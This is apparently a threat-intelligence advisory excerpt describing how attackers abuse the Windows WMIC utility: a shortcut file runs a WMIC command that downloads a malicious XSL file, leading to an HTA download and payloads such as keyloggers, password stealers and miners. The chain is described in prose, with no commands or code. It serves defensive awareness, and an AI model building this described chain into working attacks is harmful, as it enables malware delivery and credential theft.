WMIC provides administrative capabilities for local and remote systems. It can run and terminate processes, execute files and alter system parameters. WMIC has previously been used by various threat actors to traverse an affected network but is not commonly used as an infection vector.
Various payloads have been delivered using this method, including a keylogger, an email and browser password stealer, a cryptocurrency miner, a backdoor and a spam botnet.
The use of WMIC is beneficial for the attackers as it helps them to remain inconspicuous and also provides them with a powerful tool to aid them in their activities. The WMIC utility provides a command-line interface for WMI, which is used for an array of administrative capabilities for local and remote systems and can be used to query system settings, stop processes, and locally or remotely execute scripts. Parallels can be drawn between WMIC and PowerShell, another legitimate tool which is also found on Windows systems and is increasingly being abused by cyber criminals.
- The attack chain begins with the arrival of a shortcut (.lnk) file delivered via a URL, such as a link in an email, or sent as an email attachment. Once the recipient clicks on the file, the next stage in the attack is initiated.
- The shortcut file contains a WMIC command to download a file from a remote server.
- The downloaded file is a malicious XSL file.
- The URL is used to download an HTML Application (HTA) file.